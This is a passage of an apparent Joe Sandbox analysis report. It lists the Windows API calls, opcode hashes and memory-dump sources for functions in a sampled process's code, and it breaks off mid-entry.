                                                                                                                                                                                                                                                                                                    • Instruction ID: 9eecd953d73f56b44de25264e78f9ba88ae9ad3b64d119c86507d813125b869c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9316ec83bdfba6215869e1fa0b734d970b6c395bbb63600af8d13729a7234cdd
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D83108B0A602086EFF30CB658C05BFA7BB5AB59310F08C21AF49B961D2C37589458775
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00A7B5B8
                                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00A7B5D4
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00A7B63B
                                                                                                                                                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00A7B68D
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1ebf09e516eb2c6a0d0a27b390f2222bd7390ea4ebd8e31f241b26e75bc3b544
                                                                                                                                                                                                                                                                                                    • Instruction ID: 42c0c83606c0e17ac8f5839541a421596cb71c7eace3b4579a54cff3a771f3df
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ebf09e516eb2c6a0d0a27b390f2222bd7390ea4ebd8e31f241b26e75bc3b544
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40313CB0A606086EFF30CB648C057FEBBB6AF95310F04C22AE589561D1D3748A468BB5
                                                                                                                                                                                                                                                                                                    APIs
• ClientToScreen.USER32(?,?), ref: 00AA80D4
• GetWindowRect.USER32(?,?), ref: 00AA814A
• PtInRect.USER32(?,?,?), ref: 00AA815A
• MessageBeep.USER32(00000000), ref: 00AA81C6
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
APIs
• GetForegroundWindow.USER32 ref: 00AA2187
  • Part of subcall function 00A74393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A743AD
  • Part of subcall function 00A74393: GetCurrentThreadId.KERNEL32 ref: 00A743B4
  • Part of subcall function 00A74393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00A72F00), ref: 00A743BB
• GetCaretPos.USER32(?), ref: 00AA219B
• ClientToScreen.USER32(00000000,?), ref: 00AA21E8
• GetForegroundWindow.USER32 ref: 00AA21EE
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
APIs
  • Part of subcall function 00A141EA: _wcslen.LIBCMT ref: 00A141EF
• _wcslen.LIBCMT ref: 00A7E8E2
• _wcslen.LIBCMT ref: 00A7E8F9
• _wcslen.LIBCMT ref: 00A7E924
• GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00A7E92F
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: _wcslen$ExtentPoint32Text
• String ID:
• API String ID: 3763101759-0
APIs
  • Part of subcall function 00A1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A124B0
• GetCursorPos.USER32(?), ref: 00AA9A5D
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00AA9A72
• GetCursorPos.USER32(?), ref: 00AA9ABA
• DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 00AA9AF0
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: Cursor$LongMenuPopupProcTrackWindow
• String ID:
• API String ID: 2864067406-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,00AADC30), ref: 00A7DBA6
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A7DBB5
                                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A7DBC4
                                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00AADC30), ref: 00A7DC21
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2267087916-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: a47541a011a8d7db7b35ac5bbcdec0a30126809410c3abfb0bd4063230d017a9
                                                                                                                                                                                                                                                                                                    • Instruction ID: f872d22521c970250431ab4be29eaeac1e6e8b03b73fcd4e2979df7568ea08ac
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a47541a011a8d7db7b35ac5bbcdec0a30126809410c3abfb0bd4063230d017a9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F2181705082059F8700DF38CD819ABBBF8EE9A364F108A19F499C72E1DB31D94ACB52
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00AA32A6
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00AA32C0
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00AA32CE
                                                                                                                                                                                                                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00AA32DC
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: fa6f02dc2156d8487b6f82d977e32bdca623cfad3d546d516c294280ae91256b
                                                                                                                                                                                                                                                                                                    • Instruction ID: b7ab64840f15f7a0d0147411f69b451976b641df7d0743c86eecbbda252feda6
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa6f02dc2156d8487b6f82d977e32bdca623cfad3d546d516c294280ae91256b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A21D632604111AFDB14DF24C845FAABB95EF96324F248258F8668B6D2C771EE86C7D0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A796E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00A78271,?,000000FF,?,00A790BB,00000000,?,0000001C,?,?), ref: 00A796F3
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A796E4: lstrcpyW.KERNEL32(00000000,?,?,00A78271,?,000000FF,?,00A790BB,00000000,?,0000001C,?,?,00000000), ref: 00A79719
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A796E4: lstrcmpiW.KERNEL32(00000000,?,00A78271,?,000000FF,?,00A790BB,00000000,?,0000001C,?,?), ref: 00A7974A
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00A790BB,00000000,?,0000001C,?,?,00000000), ref: 00A7828A
                                                                                                                                                                                                                                                                                                    • lstrcpyW.KERNEL32(00000000,?,?,00A790BB,00000000,?,0000001C,?,?,00000000), ref: 00A782B0
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00A790BB,00000000,?,0000001C,?,?,00000000), ref: 00A782EB
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                                                                    • String ID: cdecl
                                                                                                                                                                                                                                                                                                    • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                                                                                    • Opcode ID: e17e9358b87459eefbbd00c0a4c343c044d25fecf87142c977e1ae39c929c34b
                                                                                                                                                                                                                                                                                                    • Instruction ID: 870ed662d6b2eb607e7f767c780c5f4a5d1467b214467d9fcccc27cbd2c1bdcb
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e17e9358b87459eefbbd00c0a4c343c044d25fecf87142c977e1ae39c929c34b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F211D63A200242ABCB149F78DC49D7A77A9FF45750B50C12AF94ACB290EF359811D790
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001060,?,00000004), ref: 00AA615A
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA616C
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA6177
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AA62B5
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 455545452-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: b7410313c068ae80c707d3f5604ab79aa9043fbac7acf078e1c30624ce074ad4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 09e7b6428e26388370297433bbe1020f90ec53bd7ac6c094982661482fa8e118
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7410313c068ae80c707d3f5604ab79aa9043fbac7acf078e1c30624ce074ad4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0117F75900218AADF20DFA5DC84AEE7BBCEB16764F14412AFA11970C1EB708945CF60
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00A72394
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A723A6
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A723BC
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00A723D7
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A124B0
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00A11AF4
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00A531F9
                                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00A53203
                                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00A5320E
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4127811313-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00A7EB14
                                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00A7EB47
                                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00A7EB5D
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00A7EB64
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,?,00A3D369,00000000,00000004,00000000), ref: 00A3D588
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A3D594
                                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00A3D59B
                                                                                                                                                                                                                                                                                                    • ResumeThread.KERNEL32(00000000), ref: 00A3D5B9
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 173952441-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 31e26d887e7fa112aca8040446f66d34af9ead0fd757bc30fbcf6913383d350b
                                                                                                                                                                                                                                                                                                    • Instruction ID: e4ac1e61b58fe1795e7f6e01cb472ec799aafb52d539175071de6e5e9be374d3
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31e26d887e7fa112aca8040446f66d34af9ead0fd757bc30fbcf6913383d350b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C901B572814214FFDB116FA5FC05BAA7B69EF82735F100219F9268A1E0DB718945C6A1
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A178B1
• GetStockObject.GDI32(00000011), ref: 00A178C5
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00A178CF
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: CreateMessageObjectSendStockWindow
• String ID:
• API String ID: 3970641297-0
• Opcode ID: 1170f83b5ec02d021c6fbb583f231ba1d3d2884c27f1f882d0db78232de6bd63
• Instruction ID: b7e7fb2548cc528509eba4f7fee4172450df20bdc426e63fcc84e8bcf60ac480
• Opcode Fuzzy Hash: 1170f83b5ec02d021c6fbb583f231ba1d3d2884c27f1f882d0db78232de6bd63
• Instruction Fuzzy Hash: B011A972505149BFEF169F90CC58EEABB79FF093A4F042116FA0252160DB319CA0EBA0
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00A4338D,00000364,00000000,00000000,00000000,?,00A435FE,00000006,FlsSetValue), ref: 00A43418
• GetLastError.KERNEL32(?,00A4338D,00000364,00000000,00000000,00000000,?,00A435FE,00000006,FlsSetValue,00AB3260,FlsSetValue,00000000,00000364,?,00A431B9), ref: 00A43424
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A4338D,00000364,00000000,00000000,00000000,?,00A435FE,00000006,FlsSetValue,00AB3260,FlsSetValue,00000000), ref: 00A43432
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: 6d6787689fd3d928fce8a0702f76ae834f76da0a4712b2b507f5cff8478c01ea
• Instruction ID: 2dd4140ddc0f4fa2e57cb6f7e4cd94850b9ed273b22c20c28ac4f1b3b3f23ea8
• Opcode Fuzzy Hash: 6d6787689fd3d928fce8a0702f76ae834f76da0a4712b2b507f5cff8478c01ea
• Instruction Fuzzy Hash: C501A037711223A7CF228BB59C44AD67B68BF95B627210620F947D7581D721DD02C6E0
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00A7B69A,?,00008000), ref: 00A7BA8B
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A7B69A,?,00008000), ref: 00A7BAB0
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00A7B69A,?,00008000), ref: 00A7BABA
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A7B69A,?,00008000), ref: 00A7BAED
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
• Opcode ID: d354965ca5391ceea39dba81105379e52360401b194a4b535836a5f57ed45ee7
• Instruction ID: db1a660b453c12b37178bd6686bda6adf3b0d5c1a6884a2848e2762d4e8f17ee
• Opcode Fuzzy Hash: d354965ca5391ceea39dba81105379e52360401b194a4b535836a5f57ed45ee7
• Instruction Fuzzy Hash: 86118EB0C11529DBCF00EFE9ED497EEBB78BF09750F108195D585B2180CB308651CB61
APIs
• GetWindowRect.USER32(?,?), ref: 00AA888E
• ScreenToClient.USER32(?,?), ref: 00AA88A6
• ScreenToClient.USER32(?,?), ref: 00AA88CA
• InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00AA88E5
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 357397906-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: f8f04935ccc98a16c57468f2dc897e8669b417dbef2167808835c06230567052
                                                                                                                                                                                                                                                                                                    • Instruction ID: 865ddaf7e2815677f4e04f57b115dd2fc5323bdb55bf0f3df0e22617a1ae5f10
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8f04935ccc98a16c57468f2dc897e8669b417dbef2167808835c06230567052
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B11140B9D0020AAFDB41CFA8C884AEEBBB5FF09310F508166E955E3650D735AA55CF50
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A73712
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00A73723
• GetCurrentThreadId.KERNEL32 ref: 00A7372A
• AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00A73731
Memory Dump Source
